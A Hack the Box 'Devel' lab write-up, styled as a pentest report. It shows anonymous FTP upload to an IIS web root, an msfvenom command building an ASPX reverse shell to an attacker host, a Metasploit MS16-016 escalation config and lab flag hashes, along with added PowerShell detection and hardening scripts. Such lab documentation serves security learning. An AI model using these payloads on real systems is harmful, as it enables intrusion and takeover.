HTB Devel
HTB Devel is an easy level Hack the Box challenge.
Summary
Devel is an IIS server with multiple vulnerabilities that were chained to gain local administrative privileges.
The box presents a major initial access vulnerability in having an exposed FTP server that permits anonymous logon with write permissions into the IIS wwwroot. This allows an attacker to gain initial access by uploading a malicious aspx script.
Once initial access is gained, the system is internally vulnerable to CVE-2016-0051/MS16-016, which allows for local privilege escalation to NT AUTHORITY\SYSTEM.
Service Enumeration
Nmap Scan results
```
└─$ sudo nmap -sC -sV -T 4 -vvv -Pn 10.129.127.165
Nmap scan report for 10.129.127.165
Host is up, received user-set (0.051s latency).
Scanned at 2023-08-25 14:37:05 UTC for 18s
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE REASON          VERSION
21/tcp open  ftp     syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    syn-ack ttl 127 Microsoft IIS httpd 7.5
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS7
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```
| port | protocol | version | notes |
|---|---|---|---|
| TCP 21 | FTP | MS FTPd | Anonymous logon permitted; directory listing looks like IIS default content. |
| TCP 80 | HTTP | MS IIS 7.5 | |
An initial nmap scan revealed an FTP server that permitted anonymous logon. Anonymous logon was then confirmed manually, and write permission was confirmed by uploading a text file containing the string "it worked" into the root directory of the FTP server.
Because the files in that directory looked like IIS default content, the uploaded file was requested through the IIS web interface and was served successfully. This proved that the directory exposed by the FTP server was the IIS wwwroot.
From there, a malicious ASPX script was generated with MSFvenom, uploaded via FTP, and requested through the web server, resulting in a user-level compromise.
Vulnerability Explanation
By leaving the FTP server open to anonymous logon and write, an attacker is able to arbitrarily upload files, including malicious files that can then be executed by the web server.
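The sequence described above (a script file written over FTP, then requested through IIS) leaves a clear trail in the two IIS logs, which makes it a good candidate for a detection rule. The following PowerShell script is an added example and is not part of the original writeup: it parses W3C-format IIS FTP and web logs and reports any script file that was uploaded over FTP and then requested through the web server. The two log excerpts are constructed for this example (the `#Fields:` headers, session id, file names and timestamps are illustrative); the parser reads the field order from each log's own `#Fields:` header, so it also works on real log files.

```powershell
# Added example, not part of the original writeup: correlate an IIS FTP log with
# the IIS web log to flag a script that arrived over FTP and was then requested
# through the web server. Both log excerpts below are constructed for this example.

$ftpLog = @'
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2023-08-25 14:40:01 10.10.14.141 - 10.129.127.165 21 USER anonymous 331 0 0 1a2b /
2023-08-25 14:40:01 10.10.14.141 anonymous 10.129.127.165 21 PASS *** 230 0 0 1a2b /
2023-08-25 14:40:05 10.10.14.141 anonymous 10.129.127.165 21 STOR test.txt 226 0 0 1a2b /test.txt
2023-08-25 14:41:12 10.10.14.141 anonymous 10.129.127.165 21 STOR reverse.aspx 226 0 0 1a2b /reverse.aspx
'@

$webLog = @'
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2023-08-25 14:39:50 10.129.127.165 GET /iisstart.htm - 80 - 10.10.14.141 Mozilla/5.0 200 0 0 31
2023-08-25 14:40:30 10.129.127.165 GET /test.txt - 80 - 10.10.14.141 Mozilla/5.0 200 0 0 15
2023-08-25 14:41:40 10.129.127.165 GET /reverse.aspx - 80 - 10.10.14.141 Mozilla/5.0 200 0 0 812
'@

# Parse W3C extended log text into objects whose property names come from the #Fields header.
function ConvertFrom-W3CLog {
    param([Parameter(Mandatory)][string]$Text)
    $fields = $null
    foreach ($line in ($Text -split "`r?`n")) {
        if ($line -like '#Fields:*') {
            $fields = $line.Substring('#Fields:'.Length).Trim() -split '\s+'
            continue
        }
        if ([string]::IsNullOrWhiteSpace($line) -or $line.StartsWith('#') -or -not $fields) { continue }
        $values = $line.Trim() -split '\s+'
        $record = [ordered]@{}
        for ($i = 0; $i -lt $fields.Count -and $i -lt $values.Count; $i++) { $record[$fields[$i]] = $values[$i] }
        $record['timestamp'] = [datetime]::ParseExact("$($record['date']) $($record['time'])",
            'yyyy-MM-dd HH:mm:ss', [Globalization.CultureInfo]::InvariantCulture)
        [pscustomobject]$record
    }
}

# File types IIS hands to a script engine; a new file of this kind in the web root is suspicious on its own.
$scriptExt = '\.(asp|aspx|ashx|asmx|cshtml)$'

# Completed uploads (STOR finished with FTP status 226) of script files, regardless of who performed them.
$uploads = ConvertFrom-W3CLog $ftpLog |
    Where-Object { $_.'cs-method' -eq 'STOR' -and $_.'sc-status' -eq '226' -and $_.'cs-uri-stem' -match $scriptExt }

$requests = ConvertFrom-W3CLog $webLog

# For each upload, look for a web request for the same file name at or after the upload time.
$alerts = foreach ($up in $uploads) {
    $fileName = [System.IO.Path]::GetFileName($up.'cs-uri-stem')
    $hits = $requests | Where-Object {
        [System.IO.Path]::GetFileName($_.'cs-uri-stem') -eq $fileName -and $_.timestamp -ge $up.timestamp
    }
    foreach ($hit in $hits) {
        [pscustomobject]@{
            File         = $fileName
            UploadedBy   = $up.'cs-username'
            UploadFrom   = $up.'c-ip'
            UploadedAt   = $up.timestamp
            ExecutedAt   = $hit.timestamp
            ExecutedFrom = $hit.'c-ip'
            HttpStatus   = $hit.'sc-status'
            AnonymousFtp = ($up.'cs-username' -eq 'anonymous')
        }
    }
}

$alerts | Format-Table -AutoSize
```

On the constructed excerpt only `reverse.aspx` is reported; `test.txt` is dropped by the extension filter even though it follows the same upload-then-request pattern. To run this against a live host, replace the two here-strings with `Get-Content -Raw` of the relevant files (by default IIS writes them under `C:\inetpub\logs\LogFiles\FTPSVC<n>\` and `W3SVC<n>\`), and feed the resulting objects to whatever alerting the environment uses. The `AnonymousFtp` flag is worth raising the severity on, since an anonymous STOR of an `.aspx` file should never happen on a correctly configured server.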
Vulnerability Fix
Several factors can be altered in order to correct this issue:
- Please consider securing FTP with a strong password and disabling any sort of anonymous logon.
- FTP is an unencrypted protocol. Please consider making it only available to the local network, and then using a VPN in order to make it available to remote users.
- Additionally, please consider implementing an EDR system in order to halt the execution of common malicious shellcode such as Meterpreter.
- Also consider utilizing an IDS/IPS in order to block known-malicious network traffic, such as that generated by tools like Meterpreter.
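The first two recommendations above can be applied directly to the IIS FTP site. The following PowerShell script is an added example and is not the writeup's own remediation: it disables anonymous authentication on the FTP site, removes authorization rules that grant access to everyone or to anonymous users, requires TLS on both channels, and limits the FTP control port to a management network at the host firewall. It assumes the `WebAdministration` module is available (IIS 7.5 and later); the site name `Default FTP Site`, the group `WebPublishers` and the network `10.0.0.0/8` are placeholders to be replaced with the host's real values, and the authorization attribute names (`accessType`, `users`, `roles`, `permissions`) follow the `system.ftpServer/security/authorization` section as stored in applicationHost.config.

```powershell
# Added example, not part of the original writeup: harden an IIS FTP site so it no
# longer offers anonymous, writable access to the web root.
Import-Module WebAdministration

$ftpSite  = 'Default FTP Site'   # placeholder: name of the FTP site as shown in IIS Manager
$pubGroup = 'WebPublishers'      # placeholder: local/domain group allowed to publish content
$mgmtNet  = '10.0.0.0/8'         # placeholder: the only network allowed to reach port 21
$sitePath = "IIS:\Sites\$ftpSite"

# 1. Turn off anonymous authentication and require named accounts. Make TLS mandatory on
#    the control and data channels so credentials and file contents are no longer sent in clear text.
Set-ItemProperty $sitePath -Name ftpServer.security.authentication.anonymousAuthentication.enabled -Value $false
Set-ItemProperty $sitePath -Name ftpServer.security.authentication.basicAuthentication.enabled -Value $true
Set-ItemProperty $sitePath -Name ftpServer.security.ssl.controlChannelPolicy -Value 'SslRequire'
Set-ItemProperty $sitePath -Name ftpServer.security.ssl.dataChannelPolicy -Value 'SslRequire'

# 2. Remove authorization rules granted to all users ('*') or to anonymous users ('?').
#    Without a matching rule, even a successful logon gets neither read nor write access.
$authFilter = 'system.ftpServer/security/authorization'
Get-WebConfiguration -PSPath 'IIS:\' -Location $ftpSite -Filter "$authFilter/add" |
    Where-Object { $_.users -eq '*' -or $_.users -eq '?' } |
    ForEach-Object {
        Remove-WebConfigurationProperty -PSPath 'IIS:\' -Location $ftpSite -Filter $authFilter `
            -Name '.' -AtElement @{ users = $_.users; roles = $_.roles }
    }

# 3. Grant read/write only to the dedicated publishing group.
Add-WebConfigurationProperty -PSPath 'IIS:\' -Location $ftpSite -Filter $authFilter -Name '.' `
    -Value @{ accessType = 'Allow'; users = ''; roles = $pubGroup; permissions = 'Read, Write' }

# 4. Limit the FTP control port to the management network at the host firewall. netsh is
#    used because New-NetFirewallRule is not available on Windows 7 / Server 2008 R2.
netsh advfirewall firewall add rule name=FTP-control-mgmt-only dir=in action=allow `
    protocol=TCP localport=21 remoteip=$mgmtNet

# 5. Show the resulting state for the change record.
Get-ItemProperty $sitePath -Name ftpServer.security.authentication.anonymousAuthentication.enabled
Get-WebConfiguration -PSPath 'IIS:\' -Location $ftpSite -Filter "$authFilter/add" |
    Select-Object accessType, users, roles, permissions
```

Run it from an elevated PowerShell session on the IIS host. Step 4 only adds an allow rule scoped to the management network; if an existing rule already allows port 21 from any address, it has to be removed as well, otherwise the broader rule still wins. The last two commands print the anonymous-authentication setting and the remaining authorization rules so the before/after state can be attached to the ticket.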
Severity
Internally assessed CVSS 3.0: 9.5 critical.
Proof Of Concept Code
Command line used to generate initial access shell:

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.141 LPORT=4444 -f aspx > reverse.aspx
```
Proof Screenshot
Proof Text
01ff1ec5baf99bbf2e5c5c6e30da64d6
Privilege Escalation
Once an initial access shell was achieved, the Meterpreter session was backgrounded and Metasploit's local exploit suggester was run to identify a potential privilege escalation vector.
After some trial and error with the returned results, exploit/windows/local/ms16_016_webdav was used successfully to return a reverse shell session as NT AUTHORITY\SYSTEM.
Vulnerability Explanation
CVE-2016-0051/MS16-016
Per NIST:
The WebDAV client in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 allows local users to gain privileges via a crafted application, aka "WebDAV Elevation of Privilege Vulnerability."
Vulnerability Fix
Several remedies exist for this vulnerability:
- Please consider updating Windows. This vulnerability exists only in Windows 7/Server 2008 and lower. Modern Windows 10 and 11 should not be vulnerable.
- If this host must use Windows 7/Server 2008, please consider applying the security update referenced in this article from Microsoft.
Severity
Internally assessed CVSS 3.0: 8.2 high.
Official per NIST: 7.2 high. Reference
Proof Of Concept Code
Exploitation was accomplished with an unmodified public exploit. Source can be reviewed here.
MSF Module Config:

```
Module options (exploit/windows/local/ms16_016_webdav):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  3                yes       The session to run this module on

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.141     yes       The listen address (an interface may be specified)
   LPORT     4443             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 SP1
```
Proof Screenshot
Proof Text
fe04337ca7002e7ff45c3f33222bbb50